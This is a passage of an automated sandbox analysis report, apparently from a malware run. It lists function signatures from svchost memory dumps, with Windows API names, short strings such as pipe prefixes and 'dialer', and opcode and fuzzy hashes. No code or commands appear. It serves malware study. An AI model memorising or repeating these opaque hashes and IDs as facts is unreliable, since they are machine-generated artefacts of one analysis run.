                                                                                • Instruction Fuzzy Hash: C2118E707CCB8041FA6EA7357D5F36D71416B483F2F2443A4B93A066EADE78D4028728
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 1fcdb397b1644b17d16c1eb1e9d437d376732d2965c1ff5ed4ddc4445df92217
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 168117317CCF4186FB5FAB65BC4B39926D0BB89782F44C4A5DA0447396FB3AC4458728
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 1ca0844d76c3e8bd01ab4792baa35eba0e52544e90a3a5dfd8280d08fd67e20c
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: CB31F63139AF00E1EE1BDB02BC0BB5523D4B748BA2F5905659E2F4B792DF38C0458328
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 9ee7c4574fcb2fd013fb964aa6248de50fe65bdbb00ad364504beb63cc9ade48
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 3111BF31358F4086E756CB12FC4BB1972A4F388FE6F180265EA2A87794CF38C8148748
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 9a2b3325603176c98f4169559021404f9569204c8e58316270e8b4dcf71a70dc
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 60118B36348F4086EF199B22F80E76A62B4FB88B86F040468DE990B794EF3DC545C718
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 966c8cfc9cd363fdfda02b2bdcc18e9b8abbeec9a729aea55c5a0fc7a420839d
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: E6D1C976248F88C1DA75DB0AF89A35A77A0F388B85F104252EACD47BA9DF3CC551CB14
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: cdb653347486f95d6936b3a6e080e65dbc29c48c69199ff8dba1e233120f6aa2
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: CF31D232389F5186EA1ACF16FD4BB69A7A4FB44B86F084170AE4847B55EF34C4A18314
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: bbc7888f5e4037d8188519172c2121bad00389fe15c94999cae900f3cde1423e
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: A4114D703C8F8081FA6E97317E4F76D21516B487E2F1447A4B936466E6DE78C4018728
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 4c54e0cd68b01bb03e9099f5d5445d1d048295c9e60c374dc5866ed19de68462
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 48015731348F4082EA19DB52B89AB5A63A5F788FC2F888475DE5A43754DE38C989C704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: f5791e389f93502f4c9fee8c8b73c305a7e67720a75c226d159784ea1be0102c
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 47011775259F4086EB2ADB22FC1F71A66B0BB99B87F0404A4DA5907764EF3DC148CB18
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: dfda00a6953bd7fd31afee440e3a8cdc3f116b40ca32194e381a607924f2b4fb
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 4C51A132749B008AEB1EDB25FC4FB593796F344B89F1081A8DA1747788EB75E981C718
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 7996f0918551bbe49c81effb0a51052158cdeed2e265b154e812129fb940380b
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 7A317832388B409AE71ADB21FC4BB5937A5F340B8AF158158AE5747789DB39D980C718
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d56e8e4ea1c63715ed7fae816492958a322087c5f1097162d2259ce4f6dc8c21
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: C2F06272348F4192EB65CF21FCDAB5A67A1F758BCAF848060DA4946954DF3CC68DCB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: a1c3fc9fb2c424eb5cf16538e388777059fc8f0e0a0ae8e1d12dd053b8120eaf
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: D9F06271359F0481EB1ACB29FC4FB6A6321FB88BA2F540299DA6A461E4DF3CC4448354
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 6788c6199675c10edf7c539ab1b1bd7f0a961ca82cbb9ee56a1611471c4650f0
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: E1F08C2038DF8482EA49CF13BD1F619A260AB48FC2F0880B0EE6A07B18DF3CC4458708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: 3bab7aea2da97d2c89cf869e435822f7947a441c0eb5686131a233f6f073e29f
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: 8702F67225DB8086EBA5CB59F89635AB7A0F3C4785F104055EA8E87BA8DF7CC484CF14
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: 7c0b0c8c25f7da43d0dd52c625788ab6d70cb4887c3805681c3f7a601031dd5b
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: E261C77655DF40C6E76A8B1AF84A31AB7E0F388785F100155EA8E47BA8DB7CC444CF18
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 9bd224d7f8937e48dcb23c6a92691f7b715b7476c5eb2bebaeb9097fbf750117
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 3011A722FDCF5021F66E9568FC5FB6911406B783B6F180EA4A577876D6CA34CB41811C
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: a39f79cb811ea4c1becf5d789feaa45f4274d3385c809976c6f2e92f2461cad1
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: B911A7226DCF1119FA5E1529FC4F3693180EBD9376F4846B8A9660EFDACA78C8414228
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 8e9c97b707987eaf443330098e57a4151393cd7d99a53dd1af56ba60a02a01f1
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 7561D63268CF4042F66FFB69FD4F3B966A1F782742F514495DA2A07795DB34C8428308
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 84adbe2866ac1e2fb66f4364389380746c042a873a352a778f6fc0d74beb4a81
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: E961BD33608F88CAEB29DF65E88639D77A0F358B89F044255EF4A17B99DB38C084C714
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: ff1a59e2cae9877e41fdea86006ac35bc3c2ac676c8524eb9a1b3888c61eb4ec
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 6351E172188B80CAEB7D8F65B88B35D77A4F354B86F148156DB8A47BD5CB38C490C718
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 83f5e9c311c848ec4fd2a0c7c7ec5783ac5279642614553dd1b91d6c427617f7
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 0E51D432148B80CAEB7AAF25B84B37877A0F354B86F1C8155FA8947BD5CB78D491C708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: ee813d9cd048edd468e5633751c041e363784de44c713b5dfd16f397443d62c2
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 5A51D272749B008AEB5EEF15F80BB283795F350B99F5581A6DA064778CEB74DCC08708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: fef70a26cb8617019fb27fbb8b1d28829320fb28e202bfa77e2c679c26842ebd
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 7A31A271249B40D6E71AEF21FC4B72977A4F340B9AF158059EE5A07B88DB38C980C708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 68dab6fe74a75fbd6536b3dcbd820ba112786e56dfb684d69ab30bb7c3da5d7e
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 69D13032B58F8089E716CFB9E84A79C3BB1F354B99F008256CE5997B99DB38D406C344
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 1db1360ba7b751730b1259011854ce9dc25cb220d1e3979c32bb2201401d3ca7
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 16015A32648F90C6E709DF66FD0A64A77A4F788F82F084825EA5A43729DE38C451C744
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: d3f0363712b424162af198fcb1f2ccd060454dcd3d61e37f8d2bcd7dd235890b
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: 55912632758F5485F76ADF65AC4BBAD3BA0F344B8AF144189DE0A57A94CF34D482C708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: a2a4f887a9f13fcddb2c7929769560035c01c8ba1ff43c4decbc8a8071c20252
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: CA113C22754F018AEB01CF60FC5A3A833A4F719759F440E21EA6D867A4DF78C1A8C380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: d8c6a38f007fb3a7686c76c7a8283c4c2af24b0e33f9ff83396385155cc53d9c
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 6F71E336288F8186E72EDE25BC5B3EE6B90F789B86F440066DD0A47B88DF34C641C714
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372076876.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 72cc404f53ef2108c57ae6d6efccfd71c2e81a8e4ff4a0d360792559cd38555b
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: CD61AC33608F848AEB2AEF65E8463AD77A0F344B99F044655EF4A17B98DB38D095C704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: f4fc28d39a0cdc524aee5adda2c2e0e63ac63cf0b53b223d59b02d2ca35e917c
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: 3E51063268CF8181F67EDE29B85F3AAA761F385781F440175DE9A03B49DE39C504C768
                                                                                APIs
